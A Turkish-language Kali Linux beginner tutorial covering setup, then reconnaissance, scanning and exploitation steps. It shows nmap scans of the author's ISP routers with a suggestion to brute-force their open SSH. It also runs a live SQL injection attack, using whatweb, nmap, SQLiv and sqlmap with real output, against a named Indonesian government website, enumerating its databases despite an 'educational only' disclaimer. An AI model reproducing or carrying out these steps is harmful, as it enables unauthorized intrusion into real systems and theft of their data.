Kali Linux Eğitimi

Kali Linux Tutorial



Linux, komutlar ve ortam konusunda uzmansanız veya en azından aşinaysanız, makinenize Kali Linux kurduysanız, Kali Linux Ustası veya Etik Hacker olmak istiyorsanız doğru yerdesiniz. Bu yazıda, Kali'ye aşina olmayan Linux kullanıcıları için bir Kali Linux eğitimini ele alacağım ve Kali'yi kullanırken hackleme ve güvenlik testleri için kullanılan bazı temel tekniklere başlamanızı sağlayacağım.

Kali Linux nedir?

Kali Linux, ( ilk olarak 13 Mart 2013'te yayınlandı ) resmi olarak BackTrack olarak bilinen, güvenlik firması Offensive Security tarafından geliştirilen, Debian'ın Test şubesine dayanan adli ve güvenlik odaklı bir dağıtımdır. Kali Linux, sızma testi, veri kurtarma ve tehdit tespiti göz önünde bulundurularak tasarlanmıştır. Proje, dağıtım kullanıcılarına daha güncel güvenlik araçları sağlamak amacıyla bu yılın başlarında bir sürekli sürüm modeline geçti. Kali Linux ücretsizdir ve her zaman olacaktır. Dahil 600'den fazla penetrasyon testi aracına sahiptir.







Neden Kali Linux? senin için doğru mu?

Kali Linux son zamanlarda çok popülerlik kazandı. Ve bunun arkasında bir sebep var. Hacking, popüler kültürde yapılacak en havalı şey olarak geri döndü ve bu, önemli ölçüde Bay Robot dizisine atfedilebilir. Mr. Robot'un popülaritesi Kali Linux'un yeni kullanıcılar kazanmasına yardımcı oldu. Neredeyse hiç Linux bilgisi olmayan veya bilgisayar güvenliği ile ilgili herhangi bir bilgiye sahip olmayan insanlar artık ana Linux dağıtımı olarak Kali'yi kullanmaya çalışıyorlar.



Şimdiye Kadarki En Gelişmiş Penetrasyon Testi Dağıtımımız. – Kali Linux Geliştiricileri. (Kali.org'un ana sayfasında, sayfanın en üstünde yazıyor.) Bu açıklamadan ne anlıyorsunuz? Şunu fark ettiniz mi: APTD (Gelişmiş Penetrasyon Testi Dağıtımı)? Burada kelimenin tam anlamıyla hacking terimi yoktur. Kali Linux, diğer Linux dağıtımlarıyla aynıdır. Basitçe söylemek gerekirse, güvenlikle ilgili araçlarla dolu ve ağ ve bilgisayar güvenliği uzmanlarına yönelik bir Linux dağıtımıdır. Ancak Kali Linux kullanımı sadece güvenlik ve adli tıp üzerine odaklanmaktadır.



Bir Linux Dağıtımı, Linux çekirdeğini, bir dizi temel yardımcı programı ve uygulamayı ve bazı varsayılan ayarları içeren bir paketten başka bir şey değildir. Bu nedenle Kali Linux, sağlanan araçların çoğu herhangi bir Linux dağıtımına kurulabileceği anlamında benzersiz bir şey sunmuyor.





Kali Linux, profesyonel sızma testi ve güvenlik denetiminin gereksinimlerini karşılamak için özel olarak tasarlanmıştır. Linux kullanıcılarının belirli bir alt kümesine yöneliktir. Pentesters, hacker vb. Geliştirme, web tasarımı, oyun, ofis vb. için genel amaçlı Linux masaüstü için Kali bekliyorsanız, önerilen bir dağıtım değildir. Deneyimli bir Linux kullanıcısı olsanız bile Kali size bazı zorluklar çıkarabilir. .

KALİ LINUX KURDUĞUNDA YAPILACAKLAR

Kali Linux'u kurduktan sonra, bundan sonra ne yapacağınızı merak edebilirsiniz, değil mi? Herkes bu sorunla karşı karşıya, merak etmeyin.



ADIM 1: DEPOYU KURUN

İlk olarak, bunu zaten biliyor olabilirsiniz, ancak depoyu doğru bir şekilde ayarlamak çok önemlidir. Dediğim gibi, Kali Linux yuvarlanan sürüm modeli, dağıtım kullanıcılarına daha güncel güvenlik araçları sağlama çabasında. Genel olarak, Kali Linux'u yeni yüklediyseniz, depo, yüklemek için kullandığınız medyaya atıfta bulunur. Bunu düzeltmek için depoyu resmi Kali Linux deposuyla değiştirmeniz gerekir. Gerekli dosya altında bulunur /etc/apt/sources.list . Dosyayı yaprak pedi metin düzenleyicisiyle açın ve varsayılan depoyu bu resmi Kali Rolling deposuyla değiştirin:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

ADIM 2: KALİ LINUX'UNUZU GÜNCELLEYİN VE YÜKSELTİN

Bu güncellemeden ve sisteminizi yükselttikten sonra Kali Linux'unuzu en son sürüme senkronize edin. Bunu yapmak için terminali açın ve şunu yazın:

apt update -y && apt upgrade -y && apt dist-upgrade 

apt update komutu, paket listelerini depolardaki bilgileri indirir ve getirir ve paketlerin en yeni sürümleri ve bağımlılıkları hakkında bilgi almak için bunları günceller.

apt upgrade komutu, bağımlılıklarda hata olmadığı sürece kurulu Kali Linux paketlerinin paketlerinin daha yeni sürümlerini indirir ve kurar.

apt dist-upgrade, ne olursa olsun tüm paketleri mevcut en yeni sürüme güncelleyecektir. Ayrıca gerektiğinde bağımlılıkları kurun ve kaldırın (açıkça paketleri karşılamak için bağımlılıkları kurun, ancak güncellenen bir paket artık bağımlılığa ihtiyaç duymuyorsa yetim kalan bağımlılıkları da kaldırın.

KALİ LINUX İLE TEMEL PENETRASYON TESTİ KONSEPTİ

Bu adımları başarıyla tamamladıktan sonra, hedeflenen sisteme dayalı olarak Kali Linux ile yapabileceğiniz üç ana şey vardır:

  1. Kablosuz Ağ Hackleme – Wifi hackleme, Kimlik Avı, ARP Zehirlenmesi vb.
  2. Web Uygulamaları Hackleme – SQL Enjeksiyonu, Siteler Arası İstek Sahteciliği (CSRF), Web Kimlik Avı vb.
  3. Cihaz Hackleme – Kontrolünü ele geçirmek için hedef makineyi kullanın.

IoT korsanlığını dahil etmiyorum, bu Kali Linux'un bu amaç için yeteneği olmadığı anlamına gelmez. Ancak, kelimenin tam anlamıyla Cihaz Hacking'e de ait olabilir. Cihaz fiziksel görünüme ve forma sahip olduğundan. Bu derste onlar hakkında temel bilgileri ele aldım. Kali Linux çok büyük olduğu için tek bir makaleye sığmaz!

Ayrıca Sızma Testi Döngüsü veya prosedürünü de bilmeniz gerekir. Onlar:

  1. Keşif – Bilgi Toplama
  2. Tarama
  3. Operasyon
  4. Sömürü Sonrası

KALI LINUX İLE KABLOSUZ AĞ HACKING

Kablosuz ağ korsanlığı açısından kurban değişebilir. Çünkü kablosuz ağlar, ISP (İnternet Servis Sağlayıcı), yönlendirici ve arkadaşları (modem, hub, anahtar vb.) ve istemciler (kullanıcılar, CCTV, uzak bilgisayar vb.) gibi birçok şeyden oluşur. Ayrıca savunmasız olasılıkları var.

İnternet, ağ geçitleriyle birbirine bağlanan büyük ve karmaşık bir ağ donanımı topluluğudur. Paketlerinizin izlediği yolu izlemek, belirli bir ana bilgisayar adına veya hedef IP adresine nasıl ulaştığınızı bilmek önemlidir.

Kali Linux, Traceroute adlı yerleşik bir araca sahiptir. Traceroute, alanı yaşamak için IP protokolü süresini kullanır ve bazı ana bilgisayarlara giden yol boyunca her ağ geçidinden bir ICMP TIME_EXCEEDED yanıtı almaya çalışır. Traceroute, küçük bir TTL (yaşam süresi) ile araştırma paketlerini başlatarak bir IP paketinin bazı internet ana bilgisayarlarına izleyeceği rotayı izlemeye çalışır ve ardından bir ağ geçidinden gelen ICMP süresinin aşıldığı yanıtını dinler. Traceroute kullanarak bağlantımızı yönetmek için kullanılan bir ISP yönlendiricisinin nasıl izleneceğini size ve örnek vereceğim.

1. Tanıma

Bilgi toplama en önemli başlangıçtır, bu adımı kaçırmayın. Bu adımda amacımız, alabildiğimiz kadar faydalı bilgi elde etmektir ve daha sonra bu bilgiler daha sonraki adımlar için kullanılır.

Öncelikle bir terminal açın ve siteye giden yolu izlemeye başlamak için bu komutu yazın, bu durumda siteyi google.com olarak ayarladım.

traceroute google.com 

Traceroute Ekran Görüntüsü

2. Tarama

Komutları başlattığımızda, paketimizin sırayla nereye gittiğini listeler. Yukarıda gördüğünüz gibi, bunlardan biri ISP sunucum olan 3 atlamam var. Listedeki ilk IP, ağ geçidi görevi gören yönlendiricimdir. Ve sonraki ikisi ISS'me ait. Şimdi Nmap kullanarak çalıştırdıkları servisi kontrol edelim. Yani, tarayacağımız hedefler 10.152.192.1 ve 10.13.223.102 . Terminalde aşağıdaki komutu çalıştırdım:

nmap -v -sS [IP Target] -Pn 

Komutun argümanını parçalayalım:

-v = Ayrıntı modunu etkinleştir

-sS = TCP SYN tarama tekniğini kullan

-Pn = Tüm ana bilgisayarları çevrimiçi olarak ele alın - ana bilgisayar keşfini atlayın

Ve işte aldığımız sonuç.

nmap ekran görüntüsü 2

Ne yazık ki, tüm bağlantı noktaları açık 10.152.192.1 filtrelenirse, bu IP üzerindeki tüm gelen TCP bağlantılarının IDS veya Güvenlik Duvarı tarafından engellendiği anlamına gelir. Şimdi ikinci hedefe başka bir tarama yapalım.

nmap ekran görüntüsü 1

3. Operasyon

Bu prosedürde, gerçek sömürüyü yürütme niyetinde değilim, bunun yerine size nasıl olduğunu gösteriyorum. Yukarıdaki Nmap tarama sonucuna dayanarak, bu IP'nin 22 numaralı bağlantı noktasında çalışan SSH sunucusuna sahip olduğunu ve açık olduğunu biliyoruz. Kaba kuvvete açık, haha! Deliği bulduk, bu SSH sunucusu, erişmeye çalışabileceğimiz olası delik. Kali Linux'ta SSH protokolüne karşı kaba kuvvet veya sözlük saldırılarını destekleyen birkaç araç vardır. En popüler ve güçlü olanı Hydra'dır.

Tamam, bu, buradaki örneğimizde benim ISP sunucum olan hedeflenen bir sunucuya karşı bir sızma testi yürüten temel bir prosedürdü.

KALI LINUX İLE WEB UYGULAMALARININ HACKING

Aslında, bu konuda tutkuluysanız, Kali Linux'unuza DWVA (Damn Vulnerable Web App) yükleyerek hack ortamınızı kurabilirsiniz. Bir grup savunmasız deliğe sahip bir PHP/MySQL web uygulamasıdır. Temel hedefleri, güvenlik profesyonellerinin becerilerini ve araçlarını yasal bir ortamda test etmelerine yardımcı olmak ve web geliştiricilerinin web uygulamalarını güvence altına alma süreçlerini daha iyi anlamalarına yardımcı olmaktır. DWVA'yı Github'da ücretsiz olarak buradan edinebilirsiniz: https://github.com/ethicalhack3r/DVWA.

Şimdilik size gerçek bir sitede Web Apps Hacking'i nasıl yapacağınızı göstereceğim. Ancak, bana söz verin, yalnızca eğitim amaçlıdır. SQL enjeksiyonunu kullanarak gerçek siteye gerçek bir saldırıyı simüle edeceğiz.

Önkoşul

Kapsanan araçlar:

– Whatweb (önceden yüklenmiş)

– Nmap (önceden yüklenmiş)

– SQLiv (manuel olarak yükleyin)

– SQLMap (önceden yüklenmiş)

Burada Github'da bulunan bir ek araca daha ihtiyacımız var: https://github.com/Hadesy2k/sqliv, önce onu Kali Linux'umuza kurun. Belirli bir etki alanı sağlayarak (tarama ile) hedefli tarama yapabilen SQLiv adlı bu araç. Terminali yazın:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Hedef: www.trenggalekkab.go.id

1. Tanıma

Alabildiğimiz kadar yararlı bilgi toplayın. Web sayfasını açıp bu sitede hangi uygulamanın çalıştığını tespit edebiliriz. Öncelikle, ne tür bir web sitesi olduğunu kontrol edelim. Bunu yapmak için whatweb'i kullanacağız.

whatweb www.trenggalekkab.go.id 

Hangi Web Ekran Görüntüsü

Yukarıdaki sonucu görebileceğiniz gibi, hedef Endonezya'da bulunuyor. çalışıyor Apache v2.2.27 web sunucusunda ve ayrıca PHP v5.4.31 , bir IP adresi var 103.247.21.142 . Tamam, bunu not al. Oluşturulan dosyayı veya sayfayı, URL parametrelerini ve hatta oturum açma formunu aramak için web sayfasını ziyaret etmeniz gerekebilir. Şimdilik, bir sonraki adım olan tarama için bu IP adresine ihtiyacımız var.

2. Tarama

Daha önce olduğu gibi, hedef üzerinde hangi bağlantı noktalarının ve hizmetlerin çalıştığını taramak için Nmap'i tekrar kullanıyoruz.

nmap -v -sS 103.247.21.142 

Ve işte aldığımız sonuç:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Hedefte her bir servisi işleyen bir sürü açık port var ama gözüme çarpan 3306 portundaki mysql servisi. Bu sitenin kullandığı belirtiliyor. mysql veritabanlarındaki bilgilerini yönetmek. Ardından, bu sitede herhangi bir SQL Enjeksiyon güvenlik açığı olup olmadığını merak ediyorum. Bu yüzden yeni kurduğumuz SQLiv'i kullanarak siteyi tekrar tarıyorum. komutu yazdım:

sqliv -t www.trenggalekkab.go.id 

SQL Hacking ScreenShot1

Bu sitede 2 olası SQL güvenlik açığı bulunan URL bulduk. Bu URL'leri not alın.

3. Operasyon

Tamam, SQL güvenlik açığı bulunan URL'lerimiz var ve yürütmeye hazır. Bunu yapmak için SQLMap kullanacağız. Sözdizimi:

sqlmap [Vulnerable URL] --dbs 

Komut şöyle görünmelidir:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

–dbs argümanı, SQLMap'e hedef veritabanlarını almasını söylemektir. İşte aldığımız çıktı:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap 2 veritabanı buldu, ancak bunlardan yalnızca biri yönetici kimlik bilgisi hesabı gibi hassas veriler içeren. Bu trengkab_trg'de. Veritabanlarını bulduktan sonra, yapmamız gereken bir adım daha var. Yani tabloları ve sütunları bulmak ve son adım verileri boşaltmak. Bu bölümde, bu hedefi kullanarak size nasıl olduğunu göstermeyeceğim. En azından saldırı döngüsü ve bazı araçları kullanma konusundaki temel fikri biliyorsunuz.

CİHAZ HACKING

Bu sitedeki gelecekteki bir makalede cihaz korsanlığını ele alacağız, bizi izlemeye devam edin. Ön uyarı olarak bunun için biraz Python bildiğinizden emin olmak isteyeceksiniz.